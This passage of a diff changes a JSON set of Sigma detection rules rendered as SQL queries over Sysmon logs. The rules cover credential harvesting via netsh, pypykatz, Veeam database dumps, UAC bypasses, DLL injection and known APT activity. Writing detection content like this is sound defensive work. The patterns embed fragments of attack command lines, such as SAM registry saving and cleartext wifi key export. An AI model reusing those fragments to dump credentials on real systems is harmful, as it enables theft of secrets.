PrintBrm.exe should not be run on a normal workstation.", + "author": "frack113", "tags": [ + "attack.command_and_control", + "attack.t1105", "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" + "attack.t1564.004" ], "falsepositives": [ - "Rare legitimate add to registry via cli (to these locations)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\Currentversion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\SecurityProviders\\\\WDigest%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_susp_paths.yml" + "filename": "proc_creation_win_lolbin_printbrm.yml" }, { - "title": "Service StartupType Change Via Sc.EXE", - "id": "85c312b7-f44d-4a51-a024-d671c40b49fc", - "status": "experimental", - "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher", + "id": "27aec9c9-dbb0-4939-8422-1742242471d0", + "status": "test", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - 
"attack.execution", "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives may occur with troubleshooting scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '% config %' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND (CommandLine LIKE '%disabled%' ESCAPE '\\' OR CommandLine LIKE '%demand%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_disable_service.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" }, { - "title": "Suspicious Use of PsLogList", - "id": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", - "status": "experimental", - "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Harvesting Of Wifi Credentials Via Netsh.EXE", + "id": "42b1a5b8-353f-4f10-b256-39de4467faff", + "status": "test", + "description": "Detect the harvesting of wifi credentials using netsh.exe", + "author": "Andreas Hunkeler (@Karneades), oscd.community", "tags": [ "attack.discovery", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002" + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Another tool that uses the command line switches of PsLogList", - "Legitimate use of PsLogList by an administrator" + "Unknown" ], "level": "medium", "rule": [ - 
"SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'psloglist.exe' OR (Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\')) AND (CommandLine LIKE '% security%' ESCAPE '\\' OR CommandLine LIKE '% application%' ESCAPE '\\' OR CommandLine LIKE '% system%' ESCAPE '\\') AND (CommandLine LIKE '% -d%' ESCAPE '\\' OR CommandLine LIKE '% /d%' ESCAPE '\\' OR CommandLine LIKE '% -x%' ESCAPE '\\' OR CommandLine LIKE '% /x%' ESCAPE '\\' OR CommandLine LIKE '% -s%' ESCAPE '\\' OR CommandLine LIKE '% /s%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% /c%' ESCAPE '\\' OR CommandLine LIKE '% -g%' ESCAPE '\\' OR CommandLine LIKE '% /g%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%wlan%' ESCAPE '\\' AND CommandLine LIKE '% s%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '% k%' ESCAPE '\\' AND CommandLine LIKE '%=clear%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_psloglist.yml" + "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml" }, { - "title": "Email Exifiltration Via Powershell", - "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "title": "HackTool - Pypykatz Credentials Dumping Activity", + "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", + "status": "test", + "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. 
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", + "author": "frack113", + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR Image LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_hktl_pypykatz.yml" + }, + { + "title": "Read Contents From Stdin Via Cmd.EXE", + "id": "241e802a-b65e-484f-88cd-c2dc10f9206d", "status": "experimental", - "description": "Detects email exfiltration via powershell cmdlets", - "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", + "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%<%' ESCAPE '\\')" ], - 
"filename": "proc_creation_win_powershell_email_exfil.yml" + "filename": "proc_creation_win_cmd_stdin_redirect.yml" }, { - "title": "Imports Registry Key From an ADS", - "id": "0b80ade5-6997-4b1d-99a1-71701778ea61", - "status": "test", - "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Mavinject Inject DLL Into Running Process", + "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "status": "experimental", + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND ((CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\') AND CommandLine REGEXP ':[^ \\\\]')) AND NOT ((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_import_keys_ads.yml" + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" }, { - "title": "Bypass UAC via CMSTP", - "id": "e66779cc-383e-4224-a3a4-267eeb585c40", - "status": "test", - "description": "Detect commandline usage of 
Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Renamed Rundll32 Execution", + "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", + "status": "experimental", + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002", - "attack.t1218.003" + "attack.execution" ], "falsepositives": [ - "Legitimate use of cmstp.exe utility by legitimate user" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_cmstp.yml" + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" }, { - "title": "Renamed NetSupport RAT Execution", - "id": "0afbd410-de03-4078-8491-f132303cb67d", + "title": "Suspicious Key Manager Access", + "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "status": "experimental", - "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", - "author": "Nasreddine 
Bencherchali (Nextron Systems)", + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\client32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_netsupport_rat.yml" + "filename": "proc_creation_win_rundll32_keymgr.yml" }, { - "title": "Windows Admin Share Mount Via Net.EXE", - "id": "3abd6094-7027-475f-9630-8ab9be7b9725", - "status": "test", - "description": "Detects when an admin share is mounted using net.exe", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", + "title": "Exploit for CVE-2015-1641", + "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "status": "stable", + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Administrators" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel 
= 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '% \\\\%\\\\%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_net_use_mount_admin_share.yml" + "filename": "proc_creation_win_exploit_cve_2015_1641.yml" }, { - "title": "Sensitive Registry Access via Volume Shadow Copy", - "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "status": "experimental", - "description": "Detects a command that accesses password storing registry hives via volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "New User Created Via Net.EXE With Never Expire Option", + "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "status": "test", + "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Some rare backup scenarios" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' 
ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti_shadowcopy.yml" + "filename": "proc_creation_win_net_user_add_never_expire.yml" }, { - "title": "Nltest.EXE Execution", - "id": "903076ff-f442-475a-b667-4f246bcc203b", - "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Arun Chauhan", + "title": "Lazarus Group Activity", + "id": "24c4d154-05a4-4b99-b57d-9b977472443a", + "status": "test", + "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1018", - "attack.t1482" + "attack.g0032", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate administration activity" + "Unlikely" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '% 
-p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_nltest_execution.yml" + "filename": "proc_creation_win_apt_lazarus_group_activity.yml" }, { - "title": "Exchange PowerShell Snap-Ins Usage", - "id": "25676e10-2121-446e-80a4-71ff8506af47", - "status": "experimental", - "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", - "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", + "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", + "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", + "status": "test", + "description": "Detects dump of credentials in VeeamBackup dbo", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.collection", - "attack.t1114" + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> 
$null%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_snapins_hafnium.yml" + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" }, { - "title": "Winword LOLBIN Usage", - "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", - "status": "experimental", - "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Victor Sergeev, oscd.community", + "title": "UAC Bypass Using NTFS Reparse Point - Process", + "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE 
'\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND Image LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_winword.yml" + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "Suspicious Greedy Compression Using Rar.EXE", - "id": "afe52666-401e-4a02-b4ff-5d128990b8cb", + "title": "HackTool - Certipy Execution", + "id": "6938366d-8954-4ddc-baff-c830b3ba8fcd", "status": "experimental", - "description": "Detects RAR usage that creates an archive from a suspicious folder, either a system folder or one of the folders often used by attackers for staging purposes", - "author": "X__Junior, Florian Roth", + "description": "Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Description = 'Command line RAR' OR (CommandLine LIKE '%.exe a %' ESCAPE '\\' OR CommandLine LIKE '% a -m%' ESCAPE '\\')) AND (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% -r %' ESCAPE '\\' AND (CommandLine LIKE '% C:\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\\\\\\\*.%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \\%public\\%%' ESCAPE '\\' OR CommandLine LIKE 
'% C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\$Recycle.bin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Certipy.exe' ESCAPE '\\' OR OriginalFileName = 'Certipy.exe' OR Description LIKE '%Certipy%' ESCAPE '\\') OR ((CommandLine LIKE '% auth %' ESCAPE '\\' OR CommandLine LIKE '% find %' ESCAPE '\\' OR CommandLine LIKE '% forge %' ESCAPE '\\' OR CommandLine LIKE '% relay %' ESCAPE '\\' OR CommandLine LIKE '% req %' ESCAPE '\\' OR CommandLine LIKE '% shadow %' ESCAPE '\\') AND (CommandLine LIKE '% -bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -ca-pfx %' ESCAPE '\\' OR CommandLine LIKE '% -dc-ip %' ESCAPE '\\' OR CommandLine LIKE '% -kirbi%' ESCAPE '\\' OR CommandLine LIKE '% -old-bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -pfx %' ESCAPE '\\' OR CommandLine LIKE '% -target%' ESCAPE '\\' OR CommandLine LIKE '% -username %' ESCAPE '\\' OR CommandLine LIKE '% -vulnerable%' ESCAPE '\\' OR CommandLine LIKE '%auth -pfx%' ESCAPE '\\' OR CommandLine LIKE '%shadow auto%' ESCAPE '\\' OR CommandLine LIKE '%shadow list%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_rar_susp_greedy_compression.yml" + "filename": "proc_creation_win_hktl_certipy.yml" }, { - "title": "Hiding Files with Attrib.exe", - "id": "4281cb20-2994-4580-aa63-c8b86d019934", - "status": "test", - "description": "Detects usage of attrib.exe to hide files from users.", - "author": "Sami Ruohonen", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", + "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", + "status": "experimental", + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "author": 
"Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", - "Msiexec.exe hiding desktop.ini" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +h %' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\desktop.ini %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '+R +H +S +A \\\\\\*.cui' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\\\*.bat' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_attrib_hiding_files.yml" + "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" }, { - "title": "User Discovery And Export Via Get-ADUser Cmdlet", - "id": "1114e048-b69c-4f41-bc20-657245ae6e3f", + "title": "Use of UltraViewer Remote Access Software", + "id": "88656cec-6c3b-487c-82c0-f73ebb805503", "status": "experimental", - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", - "author": 
